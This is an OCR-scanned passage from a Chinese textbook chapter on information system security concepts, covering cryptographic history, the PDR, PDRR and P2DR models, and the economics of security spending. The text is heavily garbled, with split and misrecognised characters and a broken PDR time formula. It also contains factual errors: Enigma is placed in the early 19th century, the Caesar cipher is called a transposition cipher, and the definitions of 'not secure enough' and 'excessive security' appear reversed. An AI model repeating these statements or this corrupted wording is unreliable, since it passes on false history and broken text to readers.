信息 系统 安全 ,也 常 称 为 “信息 安全 ”(information security) 或 “网 络 安全 ”(cyber secu- 
rity)。 名 词 的 不 同 , 反 映 了 认识 的 出 发 点 的 不 同 。 例 如 * 信 息 安 全 ”强调 内 容 的 安全 ,包括 
了 知识 产权 与 数据 两 个 方面 的 安全 .“ 网 络 安全 ”强调 保护 信息 网 络 基础 设施 ,而 不 是 强调 
人 们 或 企业 在 处 理 他 们 个 人 的 信息 中 如 何 发 挥 作用 。 布 什 政府 公布 的 4 保护 网 络 空间 国家 
安全 战略 ?报告 中 就 使 用 了 ”cyber security”。“ 信 息 系 统 安全 ”不 仅 强调 了 内 容 上 的 概念 ,而 
且 强 调 了 设施 的 安全 ,具有 比较 广泛 的 含义 。 不 过 ,目前 人 们 在 许多 场合 下 也 将 它们 混用 ， 
且 还 没有 一 个 权威 .公认 的 解释 和 标准 的 定义 。 一 个 基本 的 理由 就 是 信息 系统 安全 的 概 
念 是 随 着 信息 系统 的 发 展 , 随 着 信息 系统 在 社会 生活 中 的 地 位 的 变化 , 随 着 人 们 对 信息 系统 
安全 的 重视 和 理解 不 断 深化 的 。 了 解 人 们 对 于 信息 系统 安全 的 概念 的 认识 过 程 ,对 于 每 个 
学 习 或 从 事 信 息 系统 安全 的 人 是 很 有 必要 的 。 

一 般 来 说 ,多 数 人 倾向 于 把 迄今 为 止 对 信息 系统 安全 概念 分 为 如 下 3 个 层次 : 通信 保 


密 (commucation security) ,信息 防护 (information protection) 和 信息 保障 (information as- 


surance,IA) 。 
0.2.1 基于 通信 保密 的 信息 系统 安全 概念 


信息 保密 的 基本 技术 是 加 密 , 目 的 是 控制 信息 共享 的 范围 。 在 密码 历史 上 有 许多 有 趣 
的 故事 ,值得 一 提 的 是 1971 年 7 月 11 日 当时 的 美国 总 统 尼克 松 和 国务 狠 基 辛 格 的 谈话 , 尼 
克 松 问 了 句 :“ 波 罗 ”, 基 辛 格 的 回答 是 :“ 狂 洛 卡 ”。 这 神秘 的 一 问 一 答 ,原来 是 两 个 密码 。 
“ 波 罗 ” 代 表 基 辛 格 的 北京 之 行 ， 狂 洛 卡 ”代表 北京 之 行 的 结果 。 就 在 他 们 通话 的 前 两 天 ,从 
维也纳 飞 回 美国 的 基 辛 格 在 巴基斯坦 突然 “胃病 发 作 ”, 不 得 不 “小 住 两 天 ”。 在 巴基斯坦 政 
府 的 帮助 下 , 基 辛 格 飞 往 北 京 , 两 天 后 又 悄悄 地 回 到 了 巴基斯坦 ， 病 ”也 好 了 。 异 年 ,尼克 松 
总 统 亲 邑 中 国 大 门 。 从 此 ,几乎 所 有 的 当代 史书 及 有 关 刊 物 都 出 现 了 一 个 新 的 名 词 一 一 “ 基 
辛 格 波 罗 之 行 ”。 

密码 技术 最 早 因 战争 中 的 情报 传递 而 诞生 ,并 在 军事 和 市 场 竞 争 
及 外 交 活 动 的 推动 下 ,在 加 密 与 解密 之 间 的 相互 博弈 中 不 断 发 展 。 


1. 早期 的 信息 保密 


早 在 公元 前 5 世纪 , 古 希 腊 斯 巴 达 就 有 使 用 密码 器 的 记录 : 用 
一 条 带子 缠绕 在 一 根木 棍 上 , 沿 木 棍 纵 轴 方 向 写 好 明文 , 解 下 来 的 
带子 上 就 只 有 杂乱 无 章 的 密 文字 母 。 解 密 者 只 需 找到 相同 直径 的 
木 棍 ,再 把 带子 绰 上 去 , 沿 木 棍 纵 轴 方向 即 可 读 出 有 意义 的 明文 。 

公元 前 一 世纪 , 恺 撒 (CCaesar) 大 帝 ( 图 0. 2) 使 用 过 的 单字 母 蔡 


代 密 码 。 这 种 密码 体制 也 曾 用 于 历次 战争 中 ,包括 美国 独立 战争 .美国 内 战 和 两 次 世界 大 
战 。 这 是 最 早 的 换 位 密码 术 。 

以 后 ,公元 9 世纪 的 阿拉 伯 密 码 学 家 阿尔 。 金 迪 (al’ Kindi 也 称 为 伊 沙 克 Ishaq， 
801? 一 873 年 ) 公元 16 世纪 中 期 意大利 的 数学 家 卡尔 达 诺 (G. Cardano,1501 一 1576 年 ) 
发 明 的 卡尔 达 诺 漏 格 板 (覆盖 在 密 文 上 ,可 从 漏 格 中 读 出 明文 ) 等 都 对 密码 技术 作出 过 贡献 。 
但 值得 一 提 的 是 19 世纪 初期 德国 发 明 家 亚 瑟 。 谢 尔 比 乌 斯 (Arthur Scherbius) 发 明 的 加 密 
电子 机 械 名 叫 Enigma。 这 个 加 密 机 是 当时 最 为 可 靠 的 加 密 系统 。 它 的 贡献 在 于 使 人 类 开 
始 告 别 手工 编写 密码 的 繁重 劳动 。 在 第 二 次 世界 大 战 中 德国 人 利用 它 创 建 了 加 密 系统 ( 见 
图 0.3)。 然 而 ,德国 人 没有 想到 的 是 , 盟 军 居然 用 另 一 种 机 器 破解 了 德军 所 用 的 Enigma 密 
码 机 产生 的 情报 ,导致 了 德军 1940 年 夏季 在 不 列 颠 上 空 激战 中 的 惨败 。 而 30 年 以 后 ,德国 
人 才 明 白 了 这 场 空 战 失败 的 原因 是 来 自 盟 军 针 对 它 的 Enigma 加 密 机 的 Alan Turing 和 
Ultra 计划 。 


图 0.3 第 二 次 世界 大 战 中 德军 使 用 的 Enigma 加 密 机 


一 直到 计算 机 出 现 之 前 ,密码 学 一 直 是 通信 和 领域 研究 的 课题 。 围 绕 Enigma 的 激烈 较 
量 , 也 引起 人 们 对 密码 学 研究 的 兴趣 和 热情 。20 世纪 40 年 代 开 始 出 现 了 * 通 信安 全 ”“ 电 
子安 全 ”的 术语 。 到 了 20 世纪 50 年 代 , 欧 美国 家 将 “通信 和 安全”“ 电 子安 全 ” 合 称 为 “信号 安 
全 ”。 这 一 时 期 的 代表 性 研究 成 果 是 信息 论 之 父 C. E. Shannon 于 1949 年 发 表 的 (保密 系统 
的 通信 理论 》。 它 标志 着 密码 学 从 此 走 上 科学 和 理性 之 路 。 


2. 计算 机 时 代 的 信息 保密 


计算 机 的 出 现 及 其 发 展 大 大 提高 了 运算 的 能 力 ,把 密码 学 的 研究 又 推 向 一 个 新 的 阶段 ， 
后 圳 训 


呈现 一 次 革命 ,密码 学 开始 出 现 了 对 称 密 钥 体 系 和 不 对 称 密 钥 体系 。 其 代表 性 研究 成 果 是 
1976 年 W. Diffie 和 M. E. Hellman 发 表 的 《密码 学 的 新 方向 》, 以 及 1977 年 美国 公布 实施 
的 《数据 加 密 标准 (DES)》。 密 码 学 的 应 用 走 上 规范 和 广泛 应 用 的 道路 。 

但 是 ,密码 学 的 研究 并 没有 终止 。 尤 其 是 随 着 量子 计算 技术 研究 的 深入 ,过 去 在 理 
论 上 被 认为 坚不可摧 的 一 些 密码 体系 也 变 得 脆弱 了 ,人 们 开始 走 上 新 时 代 密 码 学 研究 的 


0.2.2 基于 信息 系统 防护 的 信息 系统 安全 概念 


信息 安全 是 在 机 密 性 的 基础 上 ,把 信息 安全 的 内 涵 扩充 为 完整 性 .可 用 性 真实 性 和 可 
控 性 。 它 是 一 种 被 动 的 防御 思想 ,所 以 也 称 为 信息 (系统 ) 防 护 ,具体 目标 是 : 

。 系统 保护 : 对 设施 或 技术 系统 可 靠 性 、 完 整 性 和 可 用 性 的 保护 ; 

。 信 息 内 容 保护 : 保护 系统 中 数据 的 机 密 性 、 完 整 性 和 可 用 性 。 

信息 安全 的 被 动 防御 性 还 体现 在 这 些 概念 是 从 教训 中 总 结 出 来 的 ,也 是 在 计算 机 诞生 
后 的 信息 处 理 实践 中 完善 起 来 的 。 这 个 概念 的 形成 经 历 了 计算 机 安全 、 计 算 机 网 络 安全 两 


个 阶段 。 
1. 计算 机 安全 阶段 


电子 计算 机 作为 人 类 的 智力 工具 ,大 大 提高 了 人 类 进行 计算 的 能 力 和 效率 。 而 当 20 世 
纪 50 年 代 电 子 计 算 机 开始 作为 数据 处 理 的 工具 以 后 ,人 类 才 有 了 与 电子 通信 相 匹 配 的 信息 
处 理工 具 , 人 们 才 提 出 了 “信息 系统 ”的 概念 。 信 息 处 理工 具 的 进步 也 带 来 安全 方面 的 问题 。 
除了 数据 传输 和 数据 存储 中 的 加 密 问 题 之 外 ,有 两 个 问题 被 提 了 出 来 : 一 是 计算 机 本 身 的 
安全 问题 ,一 是 数据 的 完整 性 保护 问题 。 

对 于 计算 机 本 身 安 全 的 关注 ,最早 见于 1969 年 兰 德 公 司 给 美国 国防 部 的 报告 。 报 告 中 
指出 :“ 计 算 机 太 脆 弱 了 ,有 安全 问题 ”。 这 中 间 不 仅 包 括 了 计算 机 系统 的 硬件 ,还 包括 了 计 
算 机 系统 的 软件 ,所 遭受 的 威胁 不 仅 有 滥用 、 自 然 灾 害 , 还 有 病毒 。 

对 于 数据 的 完整 性 的 考虑 ,是 由 于 数据 库 的 出 现 而 提出 的 。 数据库 优 于 文件 系统 之 处 
在 于 其 采用 了 三 级 模式 (概念 、 人 逻辑 ,物理 ) 结 构 , 实 现 了 两 极 独立 性 ,更 便于 多 用 户 共 享 。 而 
共享 性 又 必须 要 解决 其 相伴 随 的 完整 性 问题 。 

这 一 时 代 的 标志 是 1970 年 由 美国 国防 科学 委员 会 提出 ,并 于 1985 年 12 月 由 美国 国防 
部 (DoD) 公 布 的 可 信 计 算 机 系统 评价 准则 (trusted computer system evaluation criteria， 
TCSEC , 橘 皮 书 )。 它 将 计算 机 系统 的 安全 分 为 4 个 方面 (安全 政策 .可 说 明 性 、 安 全 保障 和 
文档 ) .7 个 等 级 (D、C1l、C2、B1、B2、B3、Al)。 


2. 计算 机 网 络 安全 阶段 


20 世纪 80 年 代 微 型 计算 机 开始 面市 ,与 此 同时 计算 机 网 络 进入 了 推广 普及 阶段 。 进 
入 20 世纪 90 年 代 以 后 , 受 美国 “信息 高 速 公路 ”计划 的 影响 ,世界 性 的 计算 机 网 络 应 用 掀起 


了 一 个 热潮 。“ 网 络 就 是 计算 机 ?的 概念 被 普遍 接受 ,信息 系统 的 内 涵 也 就 扩展 到 了 计算 机 
网 络 ,同时 也 使 信息 系统 出 现 了 计算 机 网 络 所 带 来 的 脆弱 性 安全 问题 。 


由 于 20 世纪 90 年 代 因 特 网 的 发 展 ,网 络 成 了 计算 机 应 用 的 重要 形式 。 计 算 机 网 络 面 
临 的 威胁 从 程度 上 ,范围 上 都 大 大 超过 了 单机 时 代 , 例 如 恶意 代码 、 各 种 非法 侵入 ,不良 信息 
的 传播 。 于是,“ 网 络 安全 ”一 词 开始 被 广泛 采用 , 它 强 调 在 整个 信息 系统 中 ,计算 机 网 络 是 
保护 的 关键 部 位 ,保护 了 计算 机 网 络 的 安全 ,信息 系统 的 主要 安全 问题 就 可 以 解决 。 

这 个 时 期 的 标志 是 “9。11? 事 件 发 生 后 ,布什 总 统 于 2001 年 10 月 16 日 签署 并 发 布 的 
13231 号 行政 命令 一 一 (信息 时 代 的 关键 基础 设施 保护 》 和 2002 年 9 月 18 日 出 台 的 《网络 
安全 国家 战略 》。 


0.2.3 基于 信息 保障 的 信息 系统 安全 概念 


一 般 认 为 ,信息 保障 (IA) 的 概念 最 早 来 自 于 1996 年 12 月 9 日 以 美国 国防 部 长 的 名 义 
发 表 的 《DoD Directive s-3600. 1:Information Operation) 中 。 在 这 个 命令 中 ,将 信息 安全 的 
属性 从 过 去 的 保密 性 、 完 整 性 、 可 用 性 又 增添 了 可 验证 性 和 不 可 否认 性 。 但 是 信息 保障 的 思 
想 应 该 说 在 这 个 命令 的 前 一 年 , 即 1995 年 12 月 美国 国防 部 提出 的 PDR 模型 中 就 已 经 体现 
出 来 了 。 或 者 说 ,信息 保障 的 概念 也 是 在 PDR(protection-detection-response, 防 护 -检测 - 响 
应 ) 模 型 的 不 断 完善 中 发 展 的 。 下 面 通过 PDR 模型 来 说 明 信 息 保障 的 内 涵 。 


1. 从 被 动 防御 到 主动 防御 


到 了 20 世纪 90 年 代 , 随 着 各 国信 息 基础 设施 建设 的 加 速 , 世 界 信息 化 的 步伐 大 大 加 
快 ,Internet 的 应 用 很 快走 向 普及 ,用 户 数量 急剧 膨胀 。 这 时 人 们 却 发 现 , 尽 管 几 十 年 来 在 
信息 安全 方面 的 科研 投入 逐步 加 大 ,技术 水 平 提高 很 快 ,安全 产品 .安全 设施 层出不穷 ,但 安 
全 事件 每 年 却 成 指数 级 增长 。 分 析 这 种 现象 ,人 们 开始 认识 到 : 传统 的 信息 安全 技术 都 集 
中 在 系统 自身 的 加 固 与 保护 上 ,例如 数据 传输 和 存储 中 的 加 密 技术 、 集 中 的 身份 认证 产品 在 
网 络 的 出 口 配置 防火 墙 等 。 然 而 这 样 的 被 动 防御 往往 只 有 事倍功半 的 效果 。 由 于 构筑 防御 
设施 时 ,不 了 解 安全 威胁 的 严重 程度 和 当前 的 安全 现状 ,往往 投资 盲目 又 抓 不 住 安全 的 关 
键 。 因 此 ,理想 的 系统 安全 需要 一 种 检测 机 制 , 以 便 动态 地 发 现 危 机 。 此 外 还 需要 响应 机 
制 ,以 便 发 现 问 题 后 快速 进行 处 理 和 恢复 。 图 0. 4 是 PDR 模型 的 形象 表示 。 可 以 看 出 ,在 
这 个 模型 中 ,用 检测 承接 防护 和 响应 过 程 。 

检测 与 防护 不 同 : 防护 与 攻击 相 比 ,防护 在 明 处 ,攻击 在 暗 处 ;而 检测 与 攻击 相 比 ,攻击 
在 明 处 ,检测 在 暗 处 。 所 以 检测 与 防护 相 比 ,防护 具有 被 动 性 ,而 检测 具有 主动 性 。 

随 着 主动 防御 思想 的 深入 发 展 ,信息 系统 安全 的 研究 也 从 不 异 一 切 代价 把 入 侵 者 阻挡 
在 系统 之 外 的 被 动 防御 ,开始 转变 为 强调 信息 系统 在 受到 攻击 的 情况 下 稳定 运行 能 力 。 
1998 年 5 月 美国 国家 安全 局 (NSA) 在 其 研究 成 果 《( 信 息 保障 技术 框架 》(Information As- 
surance Technical Framework,IATF) 中 提出 了 一 个 基于 PDR 的 PDRR(protect-detect-re- 
act-restore) 主 动 防御 模型 。PDRR 是 一 个 运用 “纵深 防卫 策略 ”(defense-in-depth strategy， 
DiD) 的 模型 , 它 在 防护 ,检测 、 响 应 之 后 又 增加 了 一 个 恢复 ,如 图 0.5 所 示 。 恢 复 就 是 使 系 
统 具 有 很 快 重新 工作 的 能 力 。 一 个 系统 能 够 在 被 攻击 后 ,很 快 恢复 工作 能 力 ,或 者 不 损失 工 
作 能 力 ,就 避免 了 处 于 被 动 挨打 的 境地 。 
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图 0.4 PDR 模型 图 0.5 PDRR 模型 


说 到 系统 的 恢复 ,人 们 不 能 不 想到 给 人 留 下 极为 深刻 教训 的 阪神 大 地 震 。 这 场 发 生 在 
1995 年 1 月 17 日 以 神户 为 中 心 的 日 本 阪神 地 区 的 地 震 , 吞 咽 了 6400 多 无 率 的 生命 ,受伤 
人 数 高 达 4 万 多 ,房屋 损坏 近 25 万 幢 , 是 日 本 自 1923 年 关东 大 地 震 以 来 受灾 损失 最 大 的 一 
次 。 图 0.6 为 当时 地 震 破坏 的 一 个 场面 。 

这 次 地 震 给 人 们 深刻 的 教训 : 我 们 的 社会 是 脆弱 的 ;而 这 样 一 个 脆弱 的 社会 会 面临 一 
些 意 想不到 的 灾难 。 关 键 的 问题 是 我 们 的 社会 在 经 受 打 击 时 还 能 不 能 继续 运转 继续 存活 ， 
如 何 才 能 把 灾难 带 来 的 损失 减少 到 最 小 。 阪 神 大 地 震 是 清晨 5 时 46 分 发 生 的 ,但 是 35 分 
钟 后 ,气象 厅 才 给 国土 厅 发 出 神户 6 级 地 震 的 传真 (后 改 为 7 级 ) ,等 到 国土 厅 的 人 看 到 这 份 
传真 时 ,地 震 已 经 过 去 1 个 多 小 时 。 当 国土 厅 的 报告 送 达 首 相 官邸 时 已 经 是 地 震 后 5 小 时 
了 。 首 相 官邸 在 灾难 的 危急 关头 成 了 “信息 的 空白 地 带 ”, 也 就 根本 谈 不 上 如 何 发 挥 政府 中 
枢 决 策 指 挥 机 构 的 功能 了 。 这 是 信息 不 通畅 造成 的 十 分 严重 的 后 果 。 

当 上 阪神 大 地 震 伴随 着 网 络 上 的 计算 机 病毒 肆虐 和 肆 无 忌 习 的 黑客 攻击 发 生 的 时 候 , 人 
们 不 能 不 联想 到 在 国家 和 组 织 的 生存 中 地 位 和 作用 日 益 险 要 、 而 自身 又 极为 脆弱 的 信息 系 
统 面临 突然 打击 时 ,我 们 的 社会 将 如 何 运 行 ,也 要 求人 们 站 在 更 高 的 角度 来 看 待 信息 系统 的 
安全 问题 。 这 就 是 信息 保障 的 概念 。 何 况 国家 或 组 织 所 遭受 的 灾难 并 不 只 是 天 灾 , 还 会 有 
人 祸 。2001 年 美国 就 遭受 了 震惊 世界 的 “9。11? 事 件 ( 见 图 0.7)。 


图 0.6 阪神 大 地 震 的 一 个 场面 图 0.7 “9。11” 事 件 
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2000 年 ,美国 发 布 了 《保卫 美国 的 计算 机 空间 一 一 信息 系统 保护 国家 计划 》, 分 析 了 美 
国 关键 基础 设施 面临 的 威胁 ,制定 了 其 关键 基础 设施 保障 框架 。 美 国 的 2001 年 国防 科学 研 
究 公 告 中 有 这 样 一 段 话 :“ 在 未 来 某 个 时 间 ,美国 将 遭受 攻击 ,这 并 不 是 计算 机 黑客 的 攻击 ， 
而 是 由 狭 独 的 敌 方 使 用 一 系列 有 效 的 信息 战 武 器 和 技术 发 动 的 攻击 。 面 对 这 样 的 威胁 ,我 
们 只 有 两 种 选择 : 攻击 发 生前 作出 调整 或 是 攻击 发 生 后 再 进行 调整 . "可见 ,基于 主动 防御 
的 信息 系统 保障 思想 对 于 我 们 的 社会 多 么 重要 。 所 以 ,美国 国防 部 于 2002 年 发 布 了 《信息 
(安全 ) 保 障 》 指 令 (8500。 1) ,于 2003 年 又 发 布 了 《信息 (安全 ) 保 障 实现 ) 指 令 (8500。2) ,以 
这 两 个 文件 作为 国防 系统 安全 评估 (也 包括 风险 管理 ) 的 依据 。 


2. 从 静态 防御 到 动态 防御 


人 们 的 研究 还 发 现 ,信息 系统 本 身 充 满 了 动态 性 。 
，* 信息 系统 的 需求 是 动态 的 。 
。 安全 漏洞 具有 动态 性 : 网 络 设 备 和 应 用 系统 在 设计 开发 过 程 中 必然 存在 某 些 缺陷 
和 漏洞 ,新 的 系统 部 件 也 会 引入 新 的 问题 。 
。 系统 建设 是 动态 的 ,新 应 用 、 新 产品 不 断 出 现 ,设备 .应 用 系统 和 操作 系统 平台 的 不 
断 升级 和 复杂 化 。 
。 网 络 拓扑 是 动态 的 : 在 网 络 的 运行 中 ,用 户 和 拓扑 是 动态 变化 的 。 
。 网络 上 的 各 种 威胁 也 是 动态 的 。 
这 些 动态 的 因素 要 求 网 络 的 防御 也 必须 是 动态 的 。 信 息 系统 的 安全 防护 除了 应 当 采 取 
加 密 、 访 问 控制 和 隔离 (如 防火 墙 ) 外 ,还 应 当 动 态 地 检测 和 监控 网 络 ,利用 检测 工具 (如 漏洞 
评估 .入 侵 检测 等 ) 了 解 和 评价 系统 的 安全 状态 ,发现 新 的 威胁 和 弱点 ,并 通过 循环 反馈 及 时 
作出 有 效 的 响应 ,将 系统 调整 到 “最 安全 ”和 “风险 最 低 " 的 状态 。 
另 一 方面 ,PDR 模型 的 出 发 点 是 任何 防护 措施 都 是 可 以 被 攻破 的 ,但 是 攻击 是 需要 时 
间 的 ,防护 、 检 测 和 响应 也 都 是 需要 时 间 的 ,没有 永久 的 防护 ,离开 了 时 间 的 安全 问题 是 没有 
意义 的 。 例 如 ,只 要 时 间 充 足 , 没 有 破解 不 了 的 密码 ; 若 时 间 极 短 ,破解 的 概率 也 极 小 。 所 以 
在 PDR 模型 中 引入 了 时 间 要 素 , 通 常用 图 0. 8 表示 这 些 基于 时 间 关 系 的 PDR 模型 原理 。 
于 是 就 有 了 3 个 时 间 参 数 : P,( 系 统 的 整体 防护 时 间 ), D, (检测 时 间 ), R,( 系 统 响应 时 间 )。 
时 间 是 量化 的 ,是 可 以 被 计算 的 。 再 引入 E, 为 暴露 时 间 , 则 可 以 得 到 如 下 关系 : 


一 | ee 

| co SR 时 间 
家 
D, R, 


图 0.8 基于 时 间 关 系 的 PDR 模型 原理 


。 如果 P, 二 D, 十 R,, 那 么 系统 是 安全 的 ; 
。 如果 P, 志 D, 十 R,, 那 么 E,=(D, 十 R,) 一 P,。 


。 1]12 。 


3. 技术 与 管理 从 分 离 到 融合 


信息 保障 强调 信息 系统 整个 生命 周期 的 防御 和 恢复 ,同时 安全 问题 的 出 现 和 解决 方案 
也 超越 了 纯 技 术 范 畴 。 为 了 确保 信息 系统 的 可 用 性 、 完 整 性 .保密 性 .可 控 性 .不 可 和 否认 性 等 
特性 , 单 靠 技术 是 难以 奏效 的 。 所 以 ,信息 安全 保障 要 依赖 于 人 、 技 术 ,管理 三 者 共同 完成 
通过 提高 系统 的 预警 能 力 ,保护 能 力 .检测 能 力 、 反 应 能 力 和 恢复 能 力 ,在 信息 和 系统 生命 周 
期 全 过 程 的 各 个 状态 下 提供 适当 的 安全 功能 。 其 中 ,管理 的 作用 是 非常 突出 的 。 

20 世纪 90 年 代 末 ,美国 国际 互联 网 安全 系统 公司 (ISS) 
提出 的 动态 的 自 适应 网 络 安全 模型 (adaptive network secur- 
ity model, ANSM) ,就 是 基于 这 种 思想 的 一 种 安全 管理 模 全 .< 
型 。 这 个 模型 称 为 PPDR( 或 PZDR) 模 型 。 如 图 0. 9 所 示 ， Polity 
它 是 在 PDR 模型 的 基础 上 增加 了 一 个 policy( 安 全 策略 ) ,并 哆 
且 这 个 P 位 于 该 模型 的 中 央 ,起 总 揽 全 局 的 主导 作用 。 

这 里 ,安全 策略 是 根据 风险 分 析 产 生 的 描述 系统 中 哪些 
资源 要 得 到 保护 ,以 及 如 何 实现 对 它们 的 保护 等 内 容 。 它 是 图 0.9 PPDR 模型 
P2DR 安全 模型 的 核心 ,是 整个 信息 系统 安全 的 依据 ,是 所 有 的 防护 ,检测 、 响 应 的 实施 依 
据 。 强 调 安 全 策略 的 实质 是 要 充分 考虑 人 的 管理 因素 。 


0.2.4 基于 经 济 学 的 信息 系统 安全 概念 


从 经 济 学 的 角度 看 ,任何 一 个 项 目 都 要 考虑 投资 效益 。 对 于 信息 系统 安全 来 说 ,需要 考 
虑 如 下 3 个 与 经 济 有 关 的 问题 : 

。 系统 资产 : 需要 保护 系统 的 哪些 资源 ? 这 些 被 保护 的 资源 统称 系统 资产 。 

。 资产 损失 : 明确 系统 被 攻击 成 功 时 遭受 的 损失 。 

。 投入 : 确定 为 保护 系统 安全 需要 投入 的 资金 。 


本 资产 


通常 用 资产 估计 来 确定 需要 保护 的 系统 的 价值 。 对 于 信息 系统 来 说 ,可 以 用 “信息 资 
产 " 来 描述 信息 化 的 成 果 。 通 常 信 息 资 产 可 以 认为 由 组 织 的 5 种 资源 组 成 。 

(1) 物理 资源 

构成 信息 系统 的 一 切 具 有 物理 形态 的 资产 都 称 为 物理 资产 ,包括 通信 线路 .通信 设备 、 
工作 站 、 服 务 器 .终端 .存储 设备 等 。 

(2) 信息 资源 

信息 资产 是 相对 于 物理 资产 而 言 的 资产 ,是 具有 信息 属性 的 资产 ,包括 软件 以 及 各 种 信 
息 资 源 ( 财 务 信息 、 人 事 信 息 .业务 信息 .计划 信息 、 设 计 信息 以 及 系统 记录 的 其 他 信息 等 )。 
它们 也 常 被 看 作 是 知识 资产 。 

(3) 时 间 资 源 

时 间 就 是 效率 ,也 就 是 一 种 宝贵 的 资产 。 

(4) 人 力 资 源 

人 力 资 源 是 组 织 最 灵活 、 最 主动 的 资源 。 


. 


(5) 信誉 (形象 ) 资 源 
信誉 是 组 织 宝贵 的 无 形 资产 。 信 誉 受到 损失 ,组织 的 形象 .可 信和 度 将 会 不 佳 ,愿意 与 之 
打交道 者 会 减少 。 


2. 资产 损失 


资产 一 旦 受到 威胁 或 破坏 ,就 会 给 组 织带 来 损失 。 损 失 可 能 表现 为 3 种 情形 : 
(1) 一 时 性 损失 。 如 系统 死机 、 人 员 不 能 工作 、 处 理 时间 拖 延 等 。 

(2) 长 期 恢复 损失 。 如 信息 资源 的 重新 配置 等 ,需要 一 定 的 时 间 。 

(3) 潜在 损失 。 如 信誉 受 损 后 ,所 产生 的 影响 要 过 一 段 时 间 才 能 表现 出 来 。 
损失 的 内 容 大 致 可 以 包括 如 下 一 些 方面 。 

(1) 资金 损失 : 用 资金 来 衡量 系统 遭受 的 损失 。 损 失 包 括 : 

。 生产 力 损失 ， 

。 直接 损失 的 设备 和 资金 ; 

。 调查 成 本 ; 

。 修复 或 更 换 设备 付出 的 成 本 ; 

。 专家 咨询 成 本 ; 

。 员工 加 班 的 报酬 等 。 

(2) 形象 损失 。 形 象 等 同 于 信任 度 ,是 一 种 无 形 的 资产 。 

(3) 业务 损失 。 这 是 一 种 潜在 的 损失 。 

(4) 人 员 流 失 。 


3. 安全 投资 


一 般 来 说 ,威胁 是 不 以 被 保护 的 系统 的 意志 为 转移 的 。 因 此 提高 系统 的 安全 强度 的 基 
本 措施 无 非 是 降低 系统 的 脆弱 性 。 但 这 是 需要 付出 代价 的 ,是 需要 投资 的 。 如 果 不 需 要 花 
费 代价 ,就 没有 脆弱 性 可 言 , 也 就 没有 系统 安全 问题 了 。 图 0. 10 为 安全 投入 安全 强度 与 侵 
和 人 可 能 性 之 间 的 关系 。 


侵 
达 
可 
能 
性 


高 中 
安全 强度 安全 强度 
(a) 安全 投入 与 侵入 可 能 性 的 折 中 (b) 平衡 点 的 变化 
图 0.10 安全 投入 、 安 全 强度 与 侵入 可 能 性 间 的 关系 


由 图 0. 10 中 可 以 看 出 : 
和 


(1) 安全 强度 越 高 ,侵入 得 如 的 可 能 性 就 越 低 。 但 是 , 当 侵入 的 可 能 性 降低 到 一 定 程度 
时 ,要 继续 降低 侵入 可 能 性 ,就 需要 更 大 幅度 的 安全 强度 。 

(2) 较 低 的 安全 强度 需要 较 低 的 安全 投资 , 较 高 的 安全 强度 需要 较 高 的 安全 投资 。 但 
是 , 当 安 全 强度 提高 到 一 定 水 平时 ,继续 提高 安全 强度 ,将 要 更 大 幅度 地 提高 安全 投资 。 

(3) 把 两 条 曲线 结合 起 来 看 ,显然 要 使 侵入 的 可 能 性 降低 到 零 ,需要 的 安全 投资 可 以 说 
是 无 限 的 。 也 就 是 说 ,要 实现 完全 的 系统 安全 是 不 可 能 的 。 在 极端 的 情况 下 ,风险 的 最 大 值 
不 应 当 超过 系统 的 总 资产 ,否则 就 是 没有 意义 的 。 现 实 的 系统 安全 要 在 安全 代价 与 资产 损 
失 之 间 进 行 折 中 ,要 根据 系统 需要 的 安全 强度 和 经 济 力量 所 决定 的 安全 投入 进行 折 中 。 或 
者 说 ,是 在 减少 的 损失 和 为 减少 损失 需要 进行 的 投资 之 间 进 行 折 中 。 

(4) 安全 投入 与 侵入 可 能 性 之 间 的 折 中 点 会 随 着 侵入 手段 的 变化 而 移动 。 当 侵入 手段 
加 强 时 ,需要 的 安全 投入 也 要 相应 增加 。 


4. 适度 的 安全 


系统 安全 的 根本 问题 就 是 减少 资产 的 损失 。 从 资产 保护 的 角度 看 ,风险 是 丢失 所 保护 
资产 的 概率 。 但 是 ,现实 的 系统 安全 强度 的 提高 ,不仅 要 考虑 安全 投入 和 资产 损失 之 间 的 折 
中 ,还 要 受制 于 下 列 因素 : 
。 用 户 的 方便 性 。 就 像 一 个 安全 等 级 十 分 高 的 机 关 一 样 ,安全 级 别 高 也 会 给 内 部 人 员 
的 行动 带 来 很 多 约束 和 不 便 。 一 个 信息 系统 安全 强度 的 提高 ,也 会 给 用 户 的 操作 带 
来 一 些 不 便 。 
。 管理 的 复杂 性 。 一 般 来 说 ,安全 强度 高 的 系统 的 管理 (如 配置 ) 要 比 安全 强度 低 的 系 
统管 理 复杂 。 例 如 ,就 一 个 简单 的 安全 需求 :“ 对 于 信息 1, 只 能 让 A 获得 ,而 不 能 让 
B 获得 ”, 就 很 难 100% 的 保证 。 因 为 ,不 可 能 完全 杜绝 B 直接 或 间接 从 A 处 获得 I 
的 渠道 。 
。 其 他 ,如 系统 性 能 开销 、 适 应 性 改变 等 。 
因此 ,没有 真正 的 安全 ,现实 的 安全 是 “适度 的 安全 ”。 适 度 的 安全 包含 了 如 下 3 个 安全 


E> 


概念 : 

(1) 不 够 安全 : 安全 投入 大 于 所 减少 的 损失 。 
(2) 适度 安全 : 安全 投入 等 于 所 减少 的 损失 。 
(3) 过 分 安全 : 安全 投入 小 于 所 减少 的 损失 。 


0.3 信息 系统 安全 体系 


一 个 系统 的 安全 不 是 一 些 零星 的 工作 ,而 是 要 作为 一 个 整体 进行 考虑 。 这 个 整体 解决 
方案 形成 一 个 信息 系统 安全 体系 。 信 息 系统 安全 体系 的 形成 是 通过 对 于 系统 的 风险 分 析 ， 
提出 安全 需求 ,制定 出 安全 策略 ,再 根据 安全 策略 ,决定 系统 的 安全 功能 一 一 安全 服务 ,并 通 
过 相应 的 安全 机 制 来 实现 需要 的 安全 服务 。 所 以 ,一 个 系统 的 安全 体系 包括 两 部 分 内 容 : 

(1) 安全 服务 。 安 全 服务 是 安全 机 制 提供 的 对 付 安全 威胁 的 功能 以 及 配备 位 置 。 

(2) 安全 机 制 。 安 全 机 制 是 安全 服务 的 具体 实现 。 

。 15 。 


任何 信息 系统 的 安全 体系 都 是 要 结合 系统 的 实际 建立 的 。 为 了 给 信息 系统 的 安全 体系 
提供 一 个 指导 原则 和 约束 条 件 ,ISO/IEC 7498-2( 中 国标 准 为 : GB/T 9387. 2-1995《 信 息 处 
理 系统 开放 系统 互 连 基本 参考 模型 第 2 部 分 : 安全 体系 结构 》) 提 出 了 一 个 建立 在 OSI 参 
考 模型 7 层 协议 之 上 的 信息 安全 体系 结构 标准 ,并 再 ISO/IEC 7498-2 定义 了 5 类 安全 服 
